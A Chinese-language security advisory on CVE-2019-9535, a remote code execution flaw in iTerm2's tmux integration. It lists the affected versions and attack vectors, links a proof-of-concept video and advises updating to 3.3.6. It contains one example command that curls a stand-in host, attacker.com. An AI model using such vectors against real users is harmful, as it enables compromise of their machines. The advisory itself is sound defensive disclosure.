iTerm2远程代码执行漏洞安全通告

发布时间 2019-10-10

漏洞编号和级别


CVE编号:CVE-2019-9535,危险级别:高危,CVSS分值:官方未评定


影响版本


iTerm2 3.3.5之前的所有版本均受漏洞影响


漏洞概述


iTerm2 是全球最热门的终端模拟器之一,是开发人员经常使用的 MacOS 终端工具,是Mac 内置终端 app 最有力的热门开源工具替代品之一,被很多开发人员称为“Mac 终端利器”。


iTerm2官方发布了安全更新修复了一个至少存在7年的远程代码执行漏洞,这个漏洞源自 iTerm2 中的 tmux 集成功能。Tumx 应用程序是一款终端多路复用器,可允许从单个设备创建并控制多个终端。


攻击者可以在用户的终端产生输出,潜在的攻击向量包括通过 ssh 连接至恶意服务器,通过curl 获取恶意网站,或者通过 tail –f 跟踪包含某些恶意内容的日志文件。例如:curl http://attacker.com and tail -f /var/log/apache2/referer_lo。在很多情况下能够在用户计算机上执行命令。


漏洞验证


国外的Radially Open Security已经放出漏洞利用成功的视频:https://ffp4g1ylyit3jdyti1hqcvtb-wpengine.netdna-ssl.com/security/files/2019/10/cve-2019-9535.webm?_=3。模拟受害者机器连接到恶意 SSH 服务器之后,在机器上执行打开一个计算器命令的PoC 视频。




修复建议


官方已经推出安全更新,请更新至iTerm2到3.3.6版本:https://iterm2.com/downloads.html。


参考链接


https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/